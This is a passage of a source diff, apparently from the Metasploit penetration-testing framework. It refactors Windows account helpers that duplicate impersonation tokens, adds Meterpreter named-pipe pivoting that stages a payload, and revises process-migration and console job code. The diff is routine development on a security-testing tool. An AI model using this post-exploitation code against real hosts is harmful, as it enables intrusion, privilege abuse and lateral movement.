Returns: - # { - # :name => account name (e.g. "SYSTEM") - # :domain => domain where the account name was found. May have values such as - # the work station's name, BUILTIN, NT AUTHORITY, or an empty string - # :type => one of :user, :group, :domain, :alias, :well_known_group, - # :deleted_account, :invalid, :unknown, :computer - # :mapped => There was a mapping found for the SID - # } - # - # OR nil if there was an exceptional windows error (example: ran out of memory) - # - # Caveats: - # If a valid mapping is not found, only { :mapped => false } will be returned - # nil is returned if there is an *exceptional* windows error. That error is printed. - # If an invalid system_name is provided, there will be a windows error and nil returned - ## - def resolve_sid(sid, system_name = nil) - adv = client.railgun.advapi32; + # If the call failed, handle errors accordingly. + unless conversion['return'] + error = conversion['GetLastError'] - # Second param is the size of the buffer where the pointer will be written - # In railgun, if you specify 4 bytes for a PDWORD it will grow to 8, as needed. - conversion = adv.ConvertStringSidToSidA(sid, 4) + case error + when client.railgun.const('ERROR_INVALID_SID') + # An invalid SID was supplied + return { type: :invalid, mapped: false } + when client.railgun.const('ERROR_NONE_MAPPED') + # There were no accounts associated with this SID + return { mapped: false } + else + print_error "Unexpected Windows error #{error} resolving SID #{sid}" + return nil + end + end - # If the call failed, handle errors accordingly. - unless conversion['return'] - error = conversion['GetLastError'] + psid = conversion['pSid'] - case error - when client.railgun.const('ERROR_INVALID_SID') - # An invalid SID was supplied - return { :type => :invalid, :mapped => false } - else - print_error "Unexpected windows error #{error}" - return nil - end - end + # Begin/Ensure so we free the pSid buffer... + begin + # A reference to the SID data structure. Generally needed when working with sids - psid = conversion['pSid'] + # http://msdn.microsoft.com/en-us/library/aa379166(v=vs.85).aspx + lp_name = lp_referenced_domain_name = 100 + cch_name = cch_referenced_domain_name = 100 + lookup = adv.LookupAccountSidA( + system_name, + psid, + lp_name, + cch_name, + lp_referenced_domain_name, + cch_referenced_domain_name, + 1 + ) - # Begin/Ensure so we free the pSid buffer... - begin - # A reference to the SID data structure. Generally needed when working with sids + if !lookup['return'] && lookup['GetLastError'] == INSUFFICIENT_BUFFER + lp_name = cch_name = lookup['cchName'] + lp_referenced_domain_name = cch_referenced_domain_name = lookup['cchReferencedDomainName'] - # http://msdn.microsoft.com/en-us/library/aa379166(v=vs.85).aspx - lp_name = lp_referenced_domain_name = 100 - cch_name = cch_referenced_domain_name = 100 - lookup = adv.LookupAccountSidA(system_name, - psid, - lp_name, - cch_name, - lp_referenced_domain_name, - cch_referenced_domain_name, - 1) + lookup = adv.LookupAccountSidA( + system_name, + psid, + lp_name, + cch_name, + lp_referenced_domain_name, + cch_referenced_domain_name, + 1 + ) - if !lookup['return'] && lookup['GetLastError'] == INSUFFICIENT_BUFFER - lp_name = cch_name = lookup['cchName'] - lp_referenced_domain_name = cch_referenced_domain_name = lookup['cchReferencedDomainName'] + elsif !lookup['return'] + print_error "Unexpected Windows error #{lookup['GetLastError']}" + return nil + end + ensure + # We no longer need the sid so free it. + adv.FreeSid(psid) + end - lookup = adv.LookupAccountSidA(system_name, - psid, - lp_name, - cch_name, - lp_referenced_domain_name, - cch_referenced_domain_name, - 1) - elsif !lookup['return'] - print_error "Unexpected windows error #{lookup['GetLastError']}" - return nil - end - ensure - # We no longer need the sid so free it. - adv.FreeSid(psid) - end + # If the call failed, handle errors accordingly. + unless lookup['return'] + error = lookup['GetLastError'] - # If the call failed, handle errors accordingly. - unless lookup['return'] - error = lookup['GetLastError'] + case error + when client.railgun.const('ERROR_INVALID_PARAMETER') + # Unless the railgun call is broken, this means revision is wrong + return { type: :invalid } + when client.railgun.const('ERROR_NONE_MAPPED') + # There were no accounts associated with this SID + return { mapped: false } + else + print_error "Unexpected Windows error #{error} resolving SID #{sid}" + return nil + end + end - case error - when client.railgun.const('ERROR_INVALID_PARAMETER') - # Unless the railgun call is broken, this means revision is wrong - return { :type => :invalid } - when client.railgun.const('ERROR_NONE_MAPPED') - # There were no accounts associated with this SID - return { :mapped => false } - else - print_error "Unexpected windows error #{error}" - return nil - end - end + # peUse is the enum "SID_NAME_USE" + sid_type = lookup_SID_NAME_USE(lookup['peUse'].unpack('C')[0]) - # peUse is the enum "SID_NAME_USE" - sid_type = lookup_SID_NAME_USE(lookup['peUse'].unpack('C')[0]) + return { + name: lookup['Name'], + domain: lookup['ReferencedDomainName'], + type: sid_type, + mapped: true + } + end - return { - :name => lookup['Name'], - :domain => lookup['ReferencedDomainName'], - :type => sid_type, - :mapped => true - } - end + private - private + ## + # Converts a WinAPI's SID_NAME_USE enum to a symbol + # Symbols are (in order) :user, :group, :domain, :alias, :well_known_group, + # :deleted_account, :invalid, :unknown, :computer + ## + def lookup_SID_NAME_USE(enum_value) + [ + # SidTypeUser = 1 + :user, + # SidTypeGroup, + :group, + # SidTypeDomain, + :domain, + # SidTypeAlias, + :alias, + # SidTypeWellKnownGroup, + :well_known_group, + # SidTypeDeletedAccount, + :deleted_account, + # SidTypeInvalid, + :invalid, + # SidTypeUnknown, + :unknown, + # SidTypeComputer, + :computer, + # SidTypeLabel + :integrity_label + ][enum_value - 1] + end - ## - # Converts a WinAPI's SID_NAME_USE enum to a symbol - # Symbols are (in order) :user, :group, :domain, :alias, :well_known_group, - # :deleted_account, :invalid, :unknown, :computer - ## - def lookup_SID_NAME_USE(enum_value) - [ - # SidTypeUser = 1 - :user, - # SidTypeGroup, - :group, - #SidTypeDomain, - :domain, - #SidTypeAlias, - :alias, - #SidTypeWellKnownGroup, - :well_known_group, - #SidTypeDeletedAccount, - :deleted_account, - #SidTypeInvalid, - :invalid, - #SidTypeUnknown, - :unknown, - #SidTypeComputer, - :computer, - #SidTypeLabel - :integrity_label - ][enum_value - 1] - end + # Gets an impersonation token from the primary token. + # + # @return [Integer] the impersonate token handle identifier if success, nil if + # fails + def get_imperstoken + adv = session.railgun.advapi32 + tok_all = "TOKEN_ASSIGN_PRIMARY |TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY | " + tok_all << "TOKEN_QUERY_SOURCE | TOKEN_ADJUST_PRIVILEGES | TOKEN_ADJUST_GROUPS" + tok_all << " | TOKEN_ADJUST_DEFAULT" - # Gets an impersonation token from the primary token. - # - # @return [Integer] the impersonate token handle identifier if success, nil if - # fails - def get_imperstoken - adv = session.railgun.advapi32 - tok_all = "TOKEN_ASSIGN_PRIMARY |TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY | " - tok_all << "TOKEN_QUERY_SOURCE | TOKEN_ADJUST_PRIVILEGES | TOKEN_ADJUST_GROUPS" - tok_all << " | TOKEN_ADJUST_DEFAULT" + pid = session.sys.process.open.pid + pr = session.sys.process.open(pid, PROCESS_ALL_ACCESS) + pt = adv.OpenProcessToken(pr.handle, tok_all, 4) # get handle to primary token + it = adv.DuplicateToken(pt["TokenHandle"], 2, 4) # get an impersonation token + if it["return"] # if it fails return 0 for error handling + return it["DuplicateTokenHandle"] + else + return nil + end + end - pid = session.sys.process.open.pid - pr = session.sys.process.open(pid, PROCESS_ALL_ACCESS) - pt = adv.OpenProcessToken(pr.handle, tok_all, 4) #get handle to primary token - it = adv.DuplicateToken(pt["TokenHandle"],2, 4) # get an impersonation token - if it["return"] #if it fails return 0 for error handling - return it["DuplicateTokenHandle"] - else - return nil - end - end + # Gets the permissions granted from the Security Descriptor of a directory + # to an access token. + # + # @param [String] dir the directory path + # @param [Integer] token the access token + # @return [String, nil] a String describing the permissions or nil + def check_dir_perms(dir, token) + adv = session.railgun.advapi32 + si = "OWNER_SECURITY_INFORMATION | GROUP_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION" + result = "" - # Gets the permissions granted from the Security Descriptor of a directory - # to an access token. - # - # @param [String] dir the directory path - # @param [Integer] token the access token - # @return [String, nil] a String describing the permissions or nil - def check_dir_perms(dir, token) - adv = session.railgun.advapi32 - si = "OWNER_SECURITY_INFORMATION | GROUP_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION" - result = "" + # define generic mapping structure + gen_map = [0, 0, 0, 0] + gen_map = gen_map.pack("V") + buffer_size = 500 - #define generic mapping structure - gen_map = [0,0,0,0] - gen_map = gen_map.pack("V") - buffer_size = 500 + # get Security Descriptor for the directory + f = adv.GetFileSecurityA(dir, si, buffer_size, buffer_size, 4) + if f['return'] && f["lpnLengthNeeded"] <= buffer_size + sd = f["pSecurityDescriptor"] + elsif f['GetLastError'] == 122 # ERROR_INSUFFICIENT_BUFFER + sd = adv.GetFileSecurityA(dir, si, f["lpnLengthNeeded"], f["lpnLengthNeeded"], 4) + elsif f['GetLastError'] == 2 + vprint_error("The system cannot find the file specified: #{dir}") + return nil + else + vprint_error("#{f['ErrorMessage']}: #{dir}") + return nil + end - #get Security Descriptor for the directory - f = adv.GetFileSecurityA(dir, si, buffer_size, buffer_size, 4) - if (f['return'] and f["lpnLengthNeeded"] <= buffer_size) - sd = f["pSecurityDescriptor"] - elsif (f['GetLastError'] == 122) # ERROR_INSUFFICIENT_BUFFER - f = adv.GetFileSecurityA(dir, si, f["lpnLengthNeeded"], f["lpnLengthNeeded"], 4) - elsif (f['GetLastError'] == 2) - vprint_error("The system cannot find the file specified: #{dir}") - return nil - else - vprint_error("#{f['ErrorMessage']}: #{dir}") - return nil - end + # check for write access, called once to get buffer size + a = adv.AccessCheck(sd, token, "ACCESS_READ | ACCESS_WRITE", gen_map, 0, 0, 4, 8) + len = a["PrivilegeSetLength"] - #check for write access, called once to get buffer size - a = adv.AccessCheck(sd, token, "ACCESS_READ | ACCESS_WRITE", gen_map, 0, 0, 4, 8) - len = a["PrivilegeSetLength"] + r = adv.AccessCheck(sd, token, "ACCESS_READ", gen_map, len, len, 4, 8) + return nil if !r["return"] + result << "R" if r["GrantedAccess"] > 0 - r = adv.AccessCheck(sd, token, "ACCESS_READ", gen_map, len, len, 4, 8) - if !r["return"] then return nil end - if r["GrantedAccess"] > 0 then result << "R" end + w = adv.AccessCheck(sd, token, "ACCESS_WRITE", gen_map, len, len, 4, 8) + return nil if !w["return"] + result << "W" if w["GrantedAccess"] > 0 - w = adv.AccessCheck(sd, token, "ACCESS_WRITE", gen_map, len, len, 4, 8) - if !w["return"] then return nil end - if w["GrantedAccess"] > 0 then result << "W" end - - result - end - -end # Accounts -end # Windows -end # Post + result + end + end # Accounts + end # Windows + end # Post end # Msf diff --git a/lib/msf/ui/console/command_dispatcher/auxiliary.rb b/lib/msf/ui/console/command_dispatcher/auxiliary.rb index 32efa7a978..a568d4446e 100644 --- a/lib/msf/ui/console/command_dispatcher/auxiliary.rb +++ b/lib/msf/ui/console/command_dispatcher/auxiliary.rb @@ -96,7 +96,7 @@ class Auxiliary } # Always run passive modules in the background - if (mod.passive or mod.passive_action?(action)) + if (mod.passive || mod.passive_action?(action || mod.default_action)) jobify = true end @@ -131,8 +131,8 @@ class Auxiliary return false end - if (jobify) - print_status("Auxiliary module running as background job") + if (jobify && mod.job_id) + print_status("Auxiliary module running as background job #{mod.job_id}.") else print_status("Auxiliary module execution completed") end diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index 3eab9f4ebf..7cdb60f0ba 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -1528,6 +1528,10 @@ class Db } end + def find_nmap_path + Rex::FileUtils.find_full_path("nmap") || Rex::FileUtils.find_full_path("nmap.exe") + end + # # Import Nmap data from a file # @@ -1553,11 +1557,8 @@ class Db end end - nmap = - Rex::FileUtils.find_full_path("nmap") || - Rex::FileUtils.find_full_path("nmap.exe") - - if (not nmap) + nmap = find_nmap_path + unless nmap print_error("The nmap executable could not be found") return end @@ -1607,9 +1608,11 @@ class Db end def cmd_db_nmap_help - nmap = - Rex::FileUtils.find_full_path('nmap') || - Rex::FileUtils.find_full_path('nmap.exe') + nmap = find_nmap_path + unless nmap + print_error("The nmap executable could not be found") + return + end stdout, stderr = Open3.capture3([nmap, 'nmap'], '--help') @@ -1625,9 +1628,10 @@ class Db end def cmd_db_nmap_tabs(str, words) - nmap = - Rex::FileUtils.find_full_path('nmap') || - Rex::FileUtils.find_full_path('nmap.exe') + nmap = find_nmap_path + unless nmap + return + end stdout, stderr = Open3.capture3([nmap, 'nmap'], '--help') tabs = [] diff --git a/lib/msf/ui/console/command_dispatcher/exploit.rb b/lib/msf/ui/console/command_dispatcher/exploit.rb index a65c1a2093..08ac8aa8a7 100644 --- a/lib/msf/ui/console/command_dispatcher/exploit.rb +++ b/lib/msf/ui/console/command_dispatcher/exploit.rb @@ -145,10 +145,8 @@ class Exploit end # If we ran the exploit as a job, indicate such so the user doesn't # wonder what's up. - elsif (jobify) - if mod.job_id - print_status("Exploit running as background job.") - end + elsif (jobify && mod.job_id) + print_status("Exploit running as background job #{mod.job_id}.") # Worst case, the exploit ran but we got no session, bummer. else # If we didn't run a payload handler for this exploit it doesn't diff --git a/lib/msf/ui/console/command_dispatcher/jobs.rb b/lib/msf/ui/console/command_dispatcher/jobs.rb index b36e6a02e5..85fc1071d1 100644 --- a/lib/msf/ui/console/command_dispatcher/jobs.rb +++ b/lib/msf/ui/console/command_dispatcher/jobs.rb @@ -339,7 +339,7 @@ module Msf framework.jobs[job_id.to_s].send(:name=, job_name) end - print_status "Payload Handler Started as Job #{job_id}" + print_status "Payload handler running as background job #{job_id}." end end end diff --git a/lib/msf/ui/console/command_dispatcher/modules.rb b/lib/msf/ui/console/command_dispatcher/modules.rb index 6f4c26c074..c6c07ef26e 100644 --- a/lib/msf/ui/console/command_dispatcher/modules.rb +++ b/lib/msf/ui/console/command_dispatcher/modules.rb @@ -66,23 +66,26 @@ module Msf end def cmd_edit_help - msg = "Edit the currently active module" - msg = "#{msg} #{local_editor ? "with #{local_editor}" : "(LocalEditor or $VISUAL/$EDITOR should be set first)"}." - print_line "Usage: edit" + print_line "Usage: edit [file/to/edit.rb]" print_line - print_line msg - print_line "When done editing, you must reload the module with 'reload' or 'rerun'." + print_line "Edit a local file or the currently active module with #{local_editor}" + print_line "If a file path is specified it will automatically be reloaded after editing" + print_line "Otherwise, you can reload the active module with 'reload' or 'rerun'." print_line end # # Edit the currently active module # - def cmd_edit - if active_module - editor = local_editor - path = active_module.file_path + def cmd_edit(*args) + if args.length > 0 + path = args[0] + elsif active_module + path = active_module.file_path + end + if path + editor = local_editor if editor.nil? editor = 'vim' print_warning("LocalEditor or $VISUAL/$EDITOR should be set. Falling back on #{editor}.") @@ -90,6 +93,10 @@ module Msf print_status("Launching #{editor} #{path}") system(editor, path) + + if args.length > 0 + load args[0] + end else print_error('Nothing to edit -- try using a module first.') end diff --git a/lib/msf/ui/console/command_dispatcher/post.rb b/lib/msf/ui/console/command_dispatcher/post.rb index 7400d6b796..e117895149 100644 --- a/lib/msf/ui/console/command_dispatcher/post.rb +++ b/lib/msf/ui/console/command_dispatcher/post.rb @@ -131,8 +131,8 @@ class Post return false end - if (jobify) - print_status("Post module running as background job") + if (jobify && mod.job_id) + print_status("Post module running as background job #{mod.job_id}.") else print_status("Post module execution completed") end diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 7be5510b23..84f211c961 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -165,6 +165,14 @@ require 'msf/core/exe/segment_appender' # XXX: Add remaining ARMLE systems here end + if arch.index(ARCH_AARCH64) + if plat.index(Msf::Module::Platform::Linux) + return to_linux_aarch64_elf(framework, code) + end + + # XXX: Add remaining AARCH64 systems here + end + if arch.index(ARCH_PPC) if plat.index(Msf::Module::Platform::OSX) return to_osx_ppc_macho(framework, code) diff --git a/lib/rex/parser/nokogiri_doc_mixin.rb b/lib/rex/parser/nokogiri_doc_mixin.rb index 9e59c56061..27a3be7688 100644 --- a/lib/rex/parser/nokogiri_doc_mixin.rb +++ b/lib/rex/parser/nokogiri_doc_mixin.rb @@ -125,8 +125,6 @@ module Parser if @args[:blacklist] return false if @args[:blacklist].include?(@report_data[:host]) end - return false unless @report_data[:ports] - return false if @report_data[:ports].empty? return true end diff --git a/lib/rex/payloads/meterpreter/config.rb b/lib/rex/payloads/meterpreter/config.rb index 838d7f4814..2c0479c9af 100644 --- a/lib/rex/payloads/meterpreter/config.rb +++ b/lib/rex/payloads/meterpreter/config.rb @@ -53,7 +53,7 @@ private # if no session guid is given then we'll just pass the blank # guid through. this is important for stageless payloads - if opts[:stageless] == true + if opts[:stageless] == true || opts[:null_session_guid] == true session_guid = "\x00" * 16 else session_guid = [SecureRandom.uuid.gsub(/-/, '')].pack('H*') @@ -67,7 +67,7 @@ private session_guid # the Session GUID ] - session_data.pack('VVVA*A*') + session_data.pack('QVVA*A*') end def transport_block(opts) @@ -78,7 +78,8 @@ private lhost = "[#{lhost}]" end - url = "#{opts[:scheme]}://#{lhost}:#{opts[:lport]}" + url = "#{opts[:scheme]}://#{lhost}" + url << ":#{opts[:lport]}" if opts[:lport] url << "#{opts[:uri]}/" if opts[:uri] url << "?#{opts[:scope_id]}" if opts[:scope_id] diff --git a/lib/rex/post/hwbridge/extensions/automotive/automotive.rb b/lib/rex/post/hwbridge/extensions/automotive/automotive.rb index 9fc415fa5b..96e6e4a7fe 100644 --- a/lib/rex/post/hwbridge/extensions/automotive/automotive.rb +++ b/lib/rex/post/hwbridge/extensions/automotive/automotive.rb @@ -119,11 +119,16 @@ class Automotive < Extension # TODO: Implement sending ISO-TP > 8 bytes data = [ data ] if data.is_a? Integer if data.size < 8 - data = padd_packet(data, opt['PADDING']) if opt.key? 'PADDING' + # Padding is handled differently after 0.0.3 + if Gem::Version.new(client.api_version) < Gem::Version.new('0.0.4') + data = padd_packet(data, opt['PADDING']) if opt.key? 'PADDING' + end data = array2hex(data).join request_str = "/automotive/#{bus}/isotpsend_and_wait?srcid=#{src_id}&dstid=#{dst_id}&data=#{data}" request_str += "&timeout=#{opt['TIMEOUT']}" if opt.key? "TIMEOUT" request_str += "&maxpkts=#{opt['MAXPKTS']}" if opt.key? "MAXPKTS" + request_str += "&padding=#{opt['PADDING']}" if opt.key? "PADDING" # Won't hurt to use in older versions + request_str += "&fc=#{opt['FC']}" if opt.key? "FC" # Force flow control return check_for_errors(client.send_request(request_str)) end nil diff --git a/lib/rex/post/hwbridge/ui/console/command_dispatcher/automotive.rb b/lib/rex/post/hwbridge/ui/console/command_dispatcher/automotive.rb index 6d3a3e0528..961c42c3fe 100644 --- a/lib/rex/post/hwbridge/ui/console/command_dispatcher/automotive.rb +++ b/lib/rex/post/hwbridge/ui/console/command_dispatcher/automotive.rb @@ -174,6 +174,8 @@ class Console::CommandDispatcher::Automotive data = '' timeout = nil maxpackets = nil + flowcontrol = false + padding = nil cansend_opts = Rex::Parser::Arguments.new( '-h' => [ false, 'Help Banner' ], '-b' => [ true, 'Target bus'], @@ -181,6 +183,8 @@ class Console::CommandDispatcher::Automotive '-R' => [ true, 'Return ID'], '-D' => [ true, 'Data packet in Hex (Do not include ISOTP command size)'], '-t' => [ true, 'Timeout value'], + '-p' => [ true, 'Padding value, none if not specified'], + '-C' => [ false, 'Force flow control'], '-m' => [ true, 'Max packets to receive'] ) cansend_opts.parse(args) do |opt, _idx, val| @@ -199,6 +203,10 @@ class Console::CommandDispatcher::Automotive data = val when '-t' timeout = val.to_i + when '-p' + padding = val + when '-C' + flowcontrol = true when '-m' maxpackets = val.to_i end @@ -224,6 +232,8 @@ class Console::CommandDispatcher::Automotive opt = {} opt['TIMEOUT'] = timeout unless timeout.nil? opt['MAXPKTS'] = maxpackets unless maxpackets.nil? + opt['PADDING'] = padding unless padding.nil? + opt['FC'] = true unless flowcontrol == false result = client.automotive.send_isotp_and_wait_for_response(bus, id, ret, bytes, opt) if result.key? 'Packets' result['Packets'].each do |pkt| diff --git a/lib/rex/post/meterpreter/client.rb b/lib/rex/post/meterpreter/client.rb index d4bf04ec4f..e17302e9d7 100644 --- a/lib/rex/post/meterpreter/client.rb +++ b/lib/rex/post/meterpreter/client.rb @@ -12,6 +12,8 @@ require 'rex/post/meterpreter/object_aliases' require 'rex/post/meterpreter/packet' require 'rex/post/meterpreter/packet_parser' require 'rex/post/meterpreter/packet_dispatcher' +require 'rex/post/meterpreter/pivot' +require 'rex/post/meterpreter/pivot_container' module Rex module Post @@ -35,6 +37,7 @@ class Client include Rex::Post::Meterpreter::PacketDispatcher include Rex::Post::Meterpreter::ChannelContainer + include Rex::Post::Meterpreter::PivotContainer # # Extension name to class hash. @@ -85,7 +88,17 @@ class Client # Cleans up the meterpreter instance, terminating the dispatcher thread. # def cleanup_meterpreter - if not self.skip_cleanup + if self.pivot_session + self.pivot_session.remove_pivot_session(self.session_guid) + end + + self.pivot_sessions.keys.each do |k| + pivot = self.pivot_sessions[k] + pivot.pivoted_session.kill('Pivot closed') + pivot.pivoted_session.shutdown_passive_dispatcher + end + + unless self.skip_cleanup ext.aliases.each_value do | extension | extension.cleanup if extension.respond_to?( 'cleanup' ) end @@ -93,7 +106,7 @@ class Client dispatcher_thread.kill if dispatcher_thread - if not self.skip_cleanup + unless self.skip_cleanup core.shutdown rescue nil end @@ -117,11 +130,20 @@ class Client self.conn_id = opts[:conn_id] self.url = opts[:url] self.ssl = opts[:ssl] - self.expiration = opts[:expiration] - self.comm_timeout = opts[:comm_timeout] - self.retry_total = opts[:retry_total] - self.retry_wait = opts[:retry_wait] - self.passive_dispatcher = opts[:passive_dispatcher] + + self.pivot_session = opts[:pivot_session] + if self.pivot_session + self.expiration = self.pivot_session.expiration + self.comm_timeout = self.pivot_session.comm_timeout + self.retry_total = self.pivot_session.retry_total + self.retry_wait = self.pivot_session.retry_wait + else + self.expiration = opts[:expiration] + self.comm_timeout = opts[:comm_timeout] + self.retry_total = opts[:retry_total] + self.retry_wait = opts[:retry_wait] + self.passive_dispatcher = opts[:passive_dispatcher] + end self.response_timeout = opts[:timeout] || self.class.default_timeout self.send_keepalives = true @@ -131,7 +153,7 @@ class Client self.encode_unicode = false self.aes_key = nil - self.session_guid = '00000000-0000-0000-0000-000000000000' + self.session_guid = opts[:session_guid] || "\x00" * 16 # The SSL certificate is being passed down as a file path if opts[:ssl_cert] @@ -143,32 +165,19 @@ class Client end end - if opts[:passive_dispatcher] - initialize_passive_dispatcher + initialize_passive_dispatcher if opts[:passive_dispatcher] - register_extension_alias('core', ClientCore.new(self)) + register_extension_alias('core', ClientCore.new(self)) - initialize_inbound_handlers - initialize_channels + initialize_inbound_handlers + initialize_channels + initialize_pivots - # Register the channel inbound packet handler - register_inbound_handler(Rex::Post::Meterpreter::Channel) - else - # Switch the socket to SSL mode and receive the hello if needed - if capabilities[:ssl] and not opts[:skip_ssl] - swap_sock_plain_to_ssl() - end + # Register the channel and pivot inbound packet handlers + register_inbound_handler(Rex::Post::Meterpreter::Channel) + register_inbound_handler(Rex::Post::Meterpreter::Pivot) - register_extension_alias('core', ClientCore.new(self)) - - initialize_inbound_handlers - initialize_channels - - # Register the channel inbound packet handler - register_inbound_handler(Rex::Post::Meterpreter::Channel) - - monitor_socket - end + monitor_socket end def swap_sock_plain_to_ssl @@ -478,6 +487,10 @@ class Client # attr_accessor :passive_dispatcher # + # Reference to a session to pivot through + # + attr_accessor :pivot_session + # # Flag indicating whether to hex-encode UTF-8 file names and other strings # attr_accessor :encode_unicode diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb index cb016d61a3..69d509ef89 100644 --- a/lib/rex/post/meterpreter/client_core.rb +++ b/lib/rex/post/meterpreter/client_core.rb @@ -3,6 +3,7 @@ require 'rex/post/meterpreter/packet' require 'rex/post/meterpreter/extension' require 'rex/post/meterpreter/client' +require 'msf/core/payload/transport_config' # Used to generate a reflective DLL when migrating. This is yet another # argument for moving the meterpreter client into the Msf namespace. @@ -33,24 +34,12 @@ module Meterpreter ### class ClientCore < Extension - UNIX_PATH_MAX = 108 - DEFAULT_SOCK_PATH = "/tmp/meterpreter.sock" - - METERPRETER_TRANSPORT_SSL = 0 - METERPRETER_TRANSPORT_HTTP = 1 - METERPRETER_TRANSPORT_HTTPS = 2 - - TIMEOUT_SESSION = 24*3600*7 # 1 week - TIMEOUT_COMMS = 300 # 5 minutes - TIMEOUT_RETRY_TOTAL = 60*60 # 1 hour - TIMEOUT_RETRY_WAIT = 10 # 10 seconds - - VALID_TRANSPORTS = { - 'reverse_tcp' => METERPRETER_TRANSPORT_SSL, - 'reverse_http' => METERPRETER_TRANSPORT_HTTP, - 'reverse_https' => METERPRETER_TRANSPORT_HTTPS, - 'bind_tcp' => METERPRETER_TRANSPORT_SSL - } + VALID_TRANSPORTS = [ + 'reverse_tcp', + 'reverse_http', + 'reverse_https', + 'bind_tcp' + ] include Rex::Payloads::Meterpreter::UriChecksum @@ -67,6 +56,44 @@ class ClientCore < Extension # ## + # + # create a named pipe pivot + # + def create_named_pipe_pivot(opts) + request = Packet.create_request('core_pivot_add') + request.add_tlv(TLV_TYPE_PIVOT_NAMED_PIPE_NAME, opts[:pipe_name]) + + + c = Class.new(::Msf::Payload) + c.include(::Msf::Payload::Stager) + c.include(::Msf::Payload::TransportConfig) + + # Include the appropriate reflective dll injection module for the target process architecture... + if opts[:arch] == ARCH_X86 + c.include(::Msf::Payload::Windows::MeterpreterLoader) + elsif opts[:arch] == ARCH_X64 + c.include(::Msf::Payload::Windows::MeterpreterLoader_x64) + end + + stage_opts = { + force_write_handle: true, + datastore: { + 'PIPEHOST' => opts[:pipe_host], + 'PIPENAME' => opts[:pipe_name] + } + } + + stager = c.new() + + stage_opts[:transport_config] = [stager.transport_config_reverse_named_pipe(stage_opts)] + stage = stager.stage_payload(stage_opts) + + request.add_tlv(TLV_TYPE_PIVOT_STAGE_DATA, stage) + request.add_tlv(TLV_TYPE_PIVOT_STAGE_DATA_SIZE, stage.length) + + response = self.client.send_request(request) + end + # # Get a list of loaded commands for the given extension. # @@ -320,7 +347,7 @@ class ClientCore < Extension # def set_session_guid(guid) request = Packet.create_request('core_set_session_guid') - request.add_tlv(TLV_TYPE_SESSION_GUID, [guid.gsub(/-/, '')].pack('H*')) + request.add_tlv(TLV_TYPE_SESSION_GUID, guid) client.send_request(request) @@ -338,10 +365,7 @@ class ClientCore < Extension response = client.send_request(*args) - bytes = response.get_tlv_value(TLV_TYPE_SESSION_GUID) - - parts = bytes.unpack('H*')[0] - [parts[0, 8], parts[8, 4], parts[12, 4], parts[16, 4], parts[20, 12]].join('-') + response.get_tlv_value(TLV_TYPE_SESSION_GUID) end # @@ -541,51 +565,17 @@ class ClientCore < Extension raise RuntimeError, 'Cannot migrate into current process', caller end - if client.platform == 'linux' - if writable_dir.to_s.strip.empty? - writable_dir = tmp_folder - end - - stat_dir = client.fs.filestat.new(writable_dir) - - unless stat_dir.directory? - raise RuntimeError, "Directory #{writable_dir} not found", caller - end - # Rex::Post::FileStat#writable? isn't available - end - migrate_stub = generate_migrate_stub(target_process) migrate_payload = generate_migrate_payload(target_process) # Build the migration request request = Packet.create_request('core_migrate') - if client.platform == 'linux' - socket_path = File.join(writable_dir, Rex::Text.rand_text_alpha_lower(5 + rand(5))) - - if socket_path.length > UNIX_PATH_MAX - 1 - raise RuntimeError, 'The writable dir is too long', caller - end - - pos = migrate_payload.index(DEFAULT_SOCK_PATH) - - if pos.nil? - raise RuntimeError, 'The meterpreter binary is wrong', caller - end - - migrate_payload[pos, socket_path.length + 1] = socket_path + "\x00" - - ep = elf_ep(migrate_payload) - request.add_tlv(TLV_TYPE_MIGRATE_BASE_ADDR, 0x20040000) - request.add_tlv(TLV_TYPE_MIGRATE_ENTRY_POINT, ep) - request.add_tlv(TLV_TYPE_MIGRATE_SOCKET_PATH, socket_path, false, client.capabilities[:zlib]) - end - - request.add_tlv( TLV_TYPE_MIGRATE_PID, target_pid ) - request.add_tlv( TLV_TYPE_MIGRATE_PAYLOAD_LEN, migrate_payload.length ) - request.add_tlv( TLV_TYPE_MIGRATE_PAYLOAD, migrate_payload, false, client.capabilities[:zlib]) - request.add_tlv( TLV_TYPE_MIGRATE_STUB_LEN, migrate_stub.length ) - request.add_tlv( TLV_TYPE_MIGRATE_STUB, migrate_stub, false, client.capabilities[:zlib]) + request.add_tlv(TLV_TYPE_MIGRATE_PID, target_pid) + request.add_tlv(TLV_TYPE_MIGRATE_PAYLOAD_LEN, migrate_payload.length) + request.add_tlv(TLV_TYPE_MIGRATE_PAYLOAD, migrate_payload, false, client.capabilities[:zlib]) + request.add_tlv(TLV_TYPE_MIGRATE_STUB_LEN, migrate_stub.length) + request.add_tlv(TLV_TYPE_MIGRATE_STUB, migrate_stub, false, client.capabilities[:zlib]) if target_process['arch'] == ARCH_X64 request.add_tlv( TLV_TYPE_MIGRATE_ARCH, 2 ) # PROCESS_ARCH_X64 @@ -614,7 +604,7 @@ class ClientCore < Extension # Sleep for 5 seconds to allow the full handoff, this prevents # the original process from stealing our loadlib requests ::IO.select(nil, nil, nil, 5.0) - else + elsif client.pivot_session.nil? # Prevent new commands from being sent while we finish migrating client.comm_mutex.synchronize do # Disable the socket request monitor @@ -686,11 +676,8 @@ class ClientCore < Extension # Indicates if the given transport is a valid transport option. # def valid_transport?(transport) - if transport - VALID_TRANSPORTS.has_key?(transport.downcase) - else - false - end + return false if transport.nil? + VALID_TRANSPORTS.include?(transport.downcase) end # @@ -751,6 +738,8 @@ private case t[:url] when /^tcp/i c.include(::Msf::Payload::Windows::MigrateTcp) + when /^pipe/i + c.include(::Msf::Payload::Windows::MigrateNamedPipe) when /^http/i # Covers HTTP and HTTPS c.include(::Msf::Payload::Windows::MigrateHttp) @@ -760,6 +749,8 @@ private case t[:url] when /^tcp/i c.include(::Msf::Payload::Windows::MigrateTcp_x64) + when /^pipe/i + c.include(::Msf::Payload::Windows::MigrateNamedPipe_x64) when /^http/i # Covers HTTP and HTTPS c.include(::Msf::Payload::Windows::MigrateHttp_x64) @@ 